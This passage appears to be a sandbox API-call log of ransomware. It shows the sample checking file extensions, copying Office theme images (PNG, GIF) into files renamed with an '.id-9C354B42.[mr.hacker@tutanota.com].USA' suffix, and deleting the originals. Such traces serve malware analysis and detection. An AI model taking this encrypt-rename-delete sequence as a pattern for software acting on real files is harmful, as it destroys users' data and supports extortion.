[0046.124] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.124] lstrlenW (lpString=".ppt") returned 4 [0046.124] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.124] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0046.124] lstrlenW (lpString=".zip") returned 4 [0046.124] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.124] lstrlenW (lpString=".rar") returned 4 [0046.124] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.124] lstrlenW (lpString=".bz2") returned 4 [0046.124] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.124] lstrlenW (lpString=".7z") returned 3 [0046.124] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.124] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0046.124] lstrlenW (lpString=".dbf") returned 4 [0046.124] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.124] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0046.124] lstrlenW (lpString=".1cd") returned 4 [0046.124] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.124] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0046.124] lstrlenW (lpString=".jpg") returned 4 [0046.124] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.124] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0046.124] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0046.124] lstrlenW (lpString=".doc") returned 4 [0046.124] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.124] lstrlenW (lpString=".docx") returned 5 [0046.124] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.124] lstrlenW (lpString=".pdf") returned 4 [0046.124] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.125] lstrlenW (lpString=".xls") returned 4 [0046.125] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.125] lstrlenW (lpString=".xlsx") returned 5 [0046.125] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.125] lstrlenW (lpString=".ppt") returned 4 [0046.125] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.125] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0046.125] lstrlenW (lpString=".zip") returned 4 [0046.125] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.125] lstrlenW (lpString=".rar") returned 4 [0046.125] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.125] lstrlenW (lpString=".bz2") returned 4 [0046.125] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.125] lstrlenW (lpString=".7z") returned 3 [0046.125] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.125] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0046.125] lstrlenW (lpString=".dbf") returned 4 [0046.125] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.125] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0046.125] lstrlenW (lpString=".1cd") returned 4 [0046.125] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.125] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0046.125] lstrlenW (lpString=".jpg") returned 4 [0046.125] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.125] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0046.125] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.125] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0046.566] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=32433) returned 1 [0046.566] CloseHandle (hObject=0x210) returned 1 [0046.566] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png")) returned 0x20 [0046.566] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0046.566] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0046.566] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.566] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.566] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0046.567] GetLastError () returned 0x0 [0046.567] ReadFile (in: hFile=0x210, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x7eb1, lpOverlapped=0x0) returned 1 [0046.569] WriteFile (in: hFile=0x200, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x7ec0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x7ec0, lpOverlapped=0x0) returned 1 [0046.570] ReadFile (in: hFile=0x210, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0046.570] WriteFile (in: hFile=0x200, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.570] SetEndOfFile (hFile=0x200) returned 1 [0046.570] CloseHandle (hObject=0x200) returned 1 [0046.570] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.570] SetEndOfFile (hFile=0x210) returned 1 [0046.571] CloseHandle (hObject=0x210) returned 1 [0046.571] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0046.571] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png")) returned 1 [0046.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0046.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0046.572] lstrlenW (lpString=".doc") returned 4 [0046.572] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.572] lstrlenW (lpString=".docx") returned 5 [0046.572] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.572] lstrlenW (lpString=".pdf") returned 4 [0046.572] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.572] lstrlenW (lpString=".xls") returned 4 [0046.572] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.572] lstrlenW (lpString=".xlsx") returned 5 [0046.572] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.572] lstrlenW (lpString=".ppt") returned 4 [0046.572] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0046.572] lstrlenW (lpString=".zip") returned 4 [0046.572] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.572] lstrlenW (lpString=".rar") returned 4 [0046.572] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.572] lstrlenW (lpString=".bz2") returned 4 [0046.572] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.572] lstrlenW (lpString=".7z") returned 3 [0046.572] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0046.572] lstrlenW (lpString=".dbf") returned 4 [0046.572] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0046.572] lstrlenW (lpString=".1cd") returned 4 [0046.572] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0046.572] lstrlenW (lpString=".jpg") returned 4 [0046.572] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0046.573] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0046.573] lstrlenW (lpString=".doc") returned 4 [0046.573] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.573] lstrlenW (lpString=".docx") returned 5 [0046.573] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.573] lstrlenW (lpString=".pdf") returned 4 [0046.573] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.573] lstrlenW (lpString=".xls") returned 4 [0046.573] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.573] lstrlenW (lpString=".xlsx") returned 5 [0046.573] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.573] lstrlenW (lpString=".ppt") returned 4 [0046.573] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.573] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0046.573] lstrlenW (lpString=".zip") returned 4 [0046.573] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.573] lstrlenW (lpString=".rar") returned 4 [0046.573] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.573] lstrlenW (lpString=".bz2") returned 4 [0046.573] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.573] lstrlenW (lpString=".7z") returned 3 [0046.573] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.573] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0046.573] lstrlenW (lpString=".dbf") returned 4 [0046.573] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.573] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0046.573] lstrlenW (lpString=".1cd") returned 4 [0046.573] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.573] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0046.573] lstrlenW (lpString=".jpg") returned 4 [0046.573] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.573] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0046.574] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.574] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0046.574] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=1379) returned 1 [0046.574] CloseHandle (hObject=0x210) returned 1 [0046.574] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif")) returned 0x20 [0046.574] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0046.574] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0046.574] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.574] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0046.574] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0047.236] GetLastError () returned 0x0 [0047.236] ReadFile (in: hFile=0x210, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x563, lpOverlapped=0x0) returned 1 [0047.237] WriteFile (in: hFile=0x1ec, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x570, lpOverlapped=0x0) returned 1 [0047.238] ReadFile (in: hFile=0x210, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0047.238] WriteFile (in: hFile=0x1ec, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.239] SetEndOfFile (hFile=0x1ec) returned 1 [0047.239] CloseHandle (hObject=0x1ec) returned 1 [0047.239] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.239] SetEndOfFile (hFile=0x210) returned 1 [0047.240] CloseHandle (hObject=0x210) returned 1 [0047.240] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0047.240] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\preview.gif")) returned 1 [0047.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0047.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0047.240] lstrlenW (lpString=".doc") returned 4 [0047.240] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.240] lstrlenW (lpString=".docx") returned 5 [0047.240] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.240] lstrlenW (lpString=".pdf") returned 4 [0047.240] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.240] lstrlenW (lpString=".xls") returned 4 [0047.240] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.240] lstrlenW (lpString=".xlsx") returned 5 [0047.240] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.240] lstrlenW (lpString=".ppt") returned 4 [0047.240] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.240] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0047.240] lstrlenW (lpString=".zip") returned 4 [0047.240] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.240] lstrlenW (lpString=".rar") returned 4 [0047.240] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.240] lstrlenW (lpString=".bz2") returned 4 [0047.241] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.241] lstrlenW (lpString=".7z") returned 3 [0047.241] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0047.241] lstrlenW (lpString=".dbf") returned 4 [0047.241] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0047.241] lstrlenW (lpString=".1cd") returned 4 [0047.241] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0047.241] lstrlenW (lpString=".jpg") returned 4 [0047.241] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0047.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0047.241] lstrlenW (lpString=".doc") returned 4 [0047.241] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.241] lstrlenW (lpString=".docx") returned 5 [0047.241] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.241] lstrlenW (lpString=".pdf") returned 4 [0047.241] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.241] lstrlenW (lpString=".xls") returned 4 [0047.241] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.241] lstrlenW (lpString=".xlsx") returned 5 [0047.241] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.241] lstrlenW (lpString=".ppt") returned 4 [0047.241] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.241] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0047.241] lstrlenW (lpString=".zip") returned 4 [0047.241] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.241] lstrlenW (lpString=".rar") returned 4 [0047.241] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.241] lstrlenW (lpString=".bz2") returned 4 [0047.241] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.241] lstrlenW (lpString=".7z") returned 3 [0047.241] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0047.242] lstrlenW (lpString=".dbf") returned 4 [0047.242] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0047.242] lstrlenW (lpString=".1cd") returned 4 [0047.242] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\PREVIEW.GIF") returned 73 [0047.242] lstrlenW (lpString=".jpg") returned 4 [0047.242] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.242] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0047.242] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.242] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.242] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=1439) returned 1 [0047.242] CloseHandle (hObject=0x210) returned 1 [0047.242] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif")) returned 0x20 [0047.242] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0047.243] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.243] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.243] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.243] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0047.244] GetLastError () returned 0x0 [0047.244] ReadFile (in: hFile=0x210, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x59f, lpOverlapped=0x0) returned 1 [0047.246] WriteFile (in: hFile=0x1ec, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x5a0, lpOverlapped=0x0) returned 1 [0047.247] ReadFile (in: hFile=0x210, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0047.247] WriteFile (in: hFile=0x1ec, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.247] SetEndOfFile (hFile=0x1ec) returned 1 [0047.247] CloseHandle (hObject=0x1ec) returned 1 [0047.247] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0047.247] SetEndOfFile (hFile=0x210) returned 1 [0047.248] CloseHandle (hObject=0x210) returned 1 [0047.248] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0047.248] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\preview.gif")) returned 1 [0047.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0047.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\PREVIEW.GIF") returned 72 [0047.248] lstrlenW (lpString=".doc") returned 4 [0047.248] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.248] lstrlenW (lpString=".docx") returned 5 [0047.249] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.249] lstrlenW (lpString=".pdf") returned 4 [0047.249] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.249] lstrlenW (lpString=".xls") returned 4 [0047.249] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.249] lstrlenW (lpString=".xlsx") returned 5 [0047.249] 